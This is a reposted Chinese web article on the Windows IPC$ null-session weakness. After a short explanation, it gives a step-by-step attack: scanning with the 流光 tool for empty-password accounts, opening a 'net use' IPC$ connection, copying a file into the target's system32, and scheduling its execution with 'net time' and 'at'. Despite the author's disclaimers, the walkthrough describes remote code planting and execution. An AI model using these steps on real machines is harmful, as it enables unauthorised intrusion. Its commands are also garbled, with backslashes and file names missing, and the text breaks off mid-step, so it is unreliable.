admin 管理员组文章数量: 1086019
2024年3月13日发(作者:一串字符中提取其中的数字)
什么是IPC$漏洞 2009-09-05 14:39出处:中国IT实验室作者:佚名【我要评论】 [导
读] 常常在网上听人说IPC漏洞,那么IPC漏洞到底是什么呢?网络流氓们是怎么利用
这个漏洞的呢?抱着这样的问题,我们一起来看看笔者带来的精彩文章!
常常在网上听人说IPC漏洞,那么IPC漏洞到底是什么呢?网络流氓们是怎么利用这个
漏洞的呢?抱着这样的问题,我们一起来看看笔者带来的精彩文章!
什么是IPC漏洞
IPC是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和
查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接(无需用户
名与密码),而利用这个空的连接,我们还可以得到目标主机上的用户列表。但是,一些别
有用心者会利用IPC,查找我们的用户列表,并使用一些字典工具,对我们的主机进行攻
击。
如何利用IPC漏洞
攻击者在这里一般会用到《流光》这个软件,兔子在这里特别提醒你,《流光》是一款
功能非常强大的软件,在我们使用时一定要注意,不得进行非法破坏!
第一步:运行《流光》(现在的最新版本是4.6),按“CTRL+R”键弹出扫描框,我们
这里只是做个测试,目的是告诉大家这个漏洞的危害,所以我们现在随便选择一段IP进行
扫描。我们扫描的是127.0.0.1(如图),其它的均使用默认,不需要改变设置。
第二步:大家打开Win2000自带的命令提示行,注:这里我们不是教大家怎么破坏,
只是给大家介绍这个漏洞的危害,所以下面的IP是假设的,并不存在。
1. C:>net use 127.0.0.1IPC "" /user:"admintitrators"
这就是刚才用《流光》扫到的用户名是administrators,密码为“空”的IP地址,如
果是攻击者的话,他就会用这样的命令来与127.0.0.1建立一个连接,因为密码为“空”,
所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命
令即可成功完成。
2. C:>copy 127.0.0.1admin
先复制上去,在流光的Tools目录下就有(这里的是指admin用户的
c:winntsystem32,大家还可以使用c、d,意思是C盘与D盘,这看你要复制到什么
地方去了)。
3. C:>net time 127.0.0.1
查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。
4. C:>at 127.0.0.1 11:05
用at命令启动吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:>net time 127.0.0.1
再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开
版权声明:本文标题:ipc漏洞简介 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/p/1710264179a565076.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论